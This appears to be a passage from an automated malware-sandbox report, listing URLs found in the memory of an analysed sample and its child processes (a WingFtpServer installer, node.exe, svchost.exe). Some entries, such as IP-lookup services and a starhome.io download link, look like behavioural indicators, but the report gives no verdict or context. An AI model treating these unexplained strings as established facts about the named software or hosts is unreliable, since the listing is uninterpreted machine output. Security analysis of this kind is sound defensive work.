          Source: WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ispp.sourceforge.net/O
          Source: WingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.553557875.0000000000977000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ispp.sourceforge.net/Over
          Source: WingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.553557875.0000000000977000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ispp.sourceforge.net/Sobre
          Source: WingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.553557875.0000000000977000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ispp.sourceforge.net/sQ
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myexternalip.com/raw
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://myexternalip.com/rawP
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myip.dnsomatic.com/
          Source: node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myip.dnsomatic.com/9
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: http://narwhaljs.org)
          Source: wns22DB.tmp, 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, wns22DB.tmp, 00000014.00000000.348371359.000000000040A000.00000008.00000001.01000000.0000000A.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: node.exe, 00000022.00000002.615283149.00000000034C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
          Source: node.exe, 00000022.00000003.533511000.0000000003558000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000002.616322384.0000000003558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
          Source: node.exe, 00000022.00000002.615283149.00000000034C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es6
          Source: z5i6tLOUD0.exe, 00000000.00000002.391081901.000000000C3DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
          Source: z5i6tLOUD0.exe, 00000000.00000002.391081901.000000000C3DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: node.exe, 00000022.00000003.533201185.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
          Source: node.exe, 00000022.00000002.614463630.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/XrWf
          Source: node.exe, 00000022.00000002.615283149.00000000034C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/i
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tnx.nl/ip
          Source: node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tnx.nl/ip9
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://trackip.net/ip
          Source: node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://trackip.net/ip9
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://trackip.net/ipL
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: http://userguide.icu-project.org/strings/properties
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://whatismyip.akamai.com/
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whatismyip.akamai.com/8
          Source: node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://whatismyip.akamai.com/9
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html
          Source: node.exe, 00000022.00000002.615283149.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.533511000.0000000003558000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000002.616322384.0000000003558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
          Source: node.exe, 00000022.00000002.615283149.00000000034C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
          Source: node.exe, 00000022.00000003.533511000.0000000003558000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000002.616322384.0000000003558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
          Source: node.exe, 00000022.00000003.533511000.0000000003558000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000002.616322384.0000000003558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
          Source: node.exe, 00000022.00000003.533511000.0000000003558000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000002.616322384.0000000003558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
          Source: node.exe, 00000022.00000003.533511000.0000000003558000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000002.616322384.0000000003558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
          Source: WingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.553557875.0000000000977000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.adilyildiz.com.tr%1
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: svchost.exe, 00000009.00000002.311253224.000001D5F9613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
          Source: node.exe, 00000022.00000002.614463630.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
          Source: node.exe, 00000022.00000002.614463630.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/(f
          Source: node.exe, 00000022.00000002.616216633.0000000003532000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.533201185.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
          Source: WingFtpServer.exe, 0000000E.00000003.314208758.000000007F6C0000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000000.327122347.0000000000401000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.innosetup.com/
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
          Source: node.exe, 00000022.00000003.533511000.0000000003558000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000002.616322384.0000000003558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
          Source: node.exe, 00000022.00000002.616216633.0000000003532000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.533201185.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
          Source: WingFtpServer.exe, 0000000E.00000003.314208758.000000007F6C0000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000000.327122347.0000000000401000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.remobjects.com/psU
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
          Source: svchost.exe, 00000009.00000003.310462310.000001D5F9661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
          Source: node.exe, 00000022.00000002.623548071.000000003ACC0000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000022.00000002.604744457.0000000001801000.00000040.00000001.01000000.0000000E.sdmp, node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=6593
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://console.spec.whatwg.org/#clear
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count-map
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://console.spec.whatwg.org/#countreset
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://console.spec.whatwg.org/#table
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://crbug.com/v8/7848
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
          Source: svchost.exe, 00000009.00000003.310479327.000001D5F965E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000009.00000003.310607336.000001D5F9659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311451621.000001D5F965A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
          Source: svchost.exe, 00000009.00000003.310462310.000001D5F9661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
          Source: svchost.exe, 00000009.00000002.311375207.000001D5F963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
          Source: svchost.exe, 00000009.00000003.310607336.000001D5F9659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311451621.000001D5F965A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
          Source: svchost.exe, 00000009.00000003.310462310.000001D5F9661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
          Source: svchost.exe, 00000009.00000003.310649707.000001D5F9647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.310620113.000001D5F9640000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311417918.000001D5F964E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
          Source: svchost.exe, 00000009.00000003.310607336.000001D5F9659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311451621.000001D5F965A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
          Source: svchost.exe, 00000009.00000003.310462310.000001D5F9661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
          Source: svchost.exe, 00000009.00000002.311375207.000001D5F963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
          Source: svchost.exe, 00000009.00000003.310462310.000001D5F9661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
          Source: svchost.exe, 00000009.00000003.310462310.000001D5F9661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
          Source: svchost.exe, 00000009.00000003.310462310.000001D5F9661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
          Source: svchost.exe, 00000009.00000003.310620113.000001D5F9640000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.310667798.000001D5F9641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311380844.000001D5F9642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
          Source: svchost.exe, 00000009.00000003.310620113.000001D5F9640000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.310667798.000001D5F9641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311380844.000001D5F9642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
          Source: svchost.exe, 00000009.00000003.310462310.000001D5F9661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
          Source: svchost.exe, 00000009.00000003.310620113.000001D5F9640000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.310607336.000001D5F9659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311451621.000001D5F965A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
          Source: svchost.exe, 00000031.00000003.501712973.0000015A14185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
          Source: svchost.exe, 00000009.00000003.310479327.000001D5F965E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000009.00000003.310607336.000001D5F9659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311451621.000001D5F965A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000009.00000003.310607336.000001D5F9659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311451621.000001D5F965A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000009.00000002.311417918.000001D5F964E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311380844.000001D5F9642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
          Source: svchost.exe, 00000009.00000003.310462310.000001D5F9661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
          Source: svchost.exe, 00000009.00000002.311375207.000001D5F963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000009.00000003.288603794.000001D5F9632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://encoding.spec.whatwg.org
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://files.starhome.io/downloads/winapp/latest-
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.starhome.io/downloads/winapp/latest-X
          Source: node.exe, 00000022.00000003.498828567.000000000E700000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://files.starhome.io/downloads/winapp/latest-ia32.json
          Source: node.exe, 00000022.00000003.488902440.0000000003480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://files.starhome.io/downloads/winapp/latest-ia32.json2
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/antirez/linenoise
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/chalk/ansi-regex/blob/master/index.js
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/chalk/supports-color
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/google/caja/blob/master/src/com/google/caja/ses/repairES5.js
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/google/caja/blob/master/src/com/google/caja/ses/startSES.js
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/isaacs/color-support.
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/joyent/node/issues/3295.
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-stream
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/mafintosh/pump
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/issues
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/10673
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/13435
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2006
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2119
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/3392
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12342
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12607
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/21313
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/26334.
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30958
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/3394
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34375
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.488902440.0000000003480000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000022.00000002.546278679.000000000019A000.00000004.00000010.00020000.00000000.sdmp, node.exe, 00000022.00000002.622984101.0000000036980000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000022.00000003.498828567.000000000E700000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sindresorhus/got)
          Source: node.exe, 00000022.00000002.622984101.0000000036980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sindresorhus/got)9
          Source: node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sindresorhus/got)H
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/standard-things/esm/issues/821.
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/tc39/ecma262/issues/1209
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
          Source: node.exe, 00000022.00000002.623548071.000000003ACC0000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000022.00000002.604744457.0000000001801000.00000040.00000001.01000000.0000000E.sdmp, node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/v8/v8/blob/d6ead37d265d7215cf9c5f768f279e21bd170212/src/js/prologue.js#L152-L156
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://goo.gl/t5IS6M).
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterators
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-operations
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://invisible-island.net/xterm/ctlseqs/ctlseqs.html
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://linux.die.net/man/1/dircolors).
